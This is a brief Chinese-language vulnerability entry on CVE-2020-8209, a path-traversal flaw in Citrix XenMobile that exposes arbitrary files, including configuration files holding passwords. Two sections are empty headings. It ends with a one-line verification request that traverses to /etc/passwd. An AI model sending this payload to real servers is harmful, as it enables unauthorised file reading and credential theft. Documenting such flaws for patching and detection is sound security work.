Citrix XenMobile 任意文件读取 CVE-2020-8209¶
漏洞描述¶
XenMobile是Citrix开发的企业移动性管理软件。该产品允许企业管理员工的移动设备和移动应用程序。该软件的目的是通过允许员工安全地在企业拥有的和个人移动设备及应用程序上工作来提高生产率。 CVE-2020-8209,路径遍历漏洞。此漏洞允许未经授权的用户读取任意文件,包括包含密码的配置文件
影响版本¶
网络测绘¶
漏洞复现¶
验证POC
/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd